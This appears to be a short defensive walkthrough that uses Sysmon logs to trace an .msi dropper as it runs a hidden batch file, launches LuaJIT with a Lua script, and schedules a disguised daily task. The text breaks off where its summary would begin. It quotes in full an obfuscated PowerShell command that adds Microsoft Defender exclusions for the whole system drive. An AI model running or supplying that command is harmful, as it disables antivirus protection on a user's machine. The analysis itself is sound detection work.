Find Malwares Using Sysmon




Note: If you are going to work with real malware, it is important to create a sandbox environment and then work to prevent your systems from being infected during your tests.

1- One of our first logs is a process creation and shows us that our .msi file is running.

2- We observe that two files are created by msiexec.exe.





powershell -WindowStyle hidden -Command "& { Invoke-Expression ('Add-MpPr' + [char]101 + 'ference -ExclusionExtension .exe, .dll -ExclusionPath $env:SystemDrive -Force') }"
3- After a few more logs, it appears that a cmd command run by msiexec.exe attempted to run the exclusion.bat file with elevated privileges, aiming to hide the runtime window. Forcing a .tmp file to run a file with elevated privileges may be considered suspicious.

4- Again, a command initiated by msiexec.exe runs the "Script.lua" file together with "LuaJIT.exe".


5- Around the same time, we see that a scheduled task was added to the system by "svchost.exe".



6- When we continue to look at the logs, we see that the "LuaJIT.exe" malware is included in a DNSRequest and the returned IP address is 208.95.112.1.


7- We can see that our main malicious file drops other malware.

8- In the previous image, we can see that a schedule task has been created to run the malware dropped on a daily basis. The fact that the name of this task includes the words "System Update" can be thought of as an attempt to disguise itself.

To summarize the behavior of the pest;
Last updated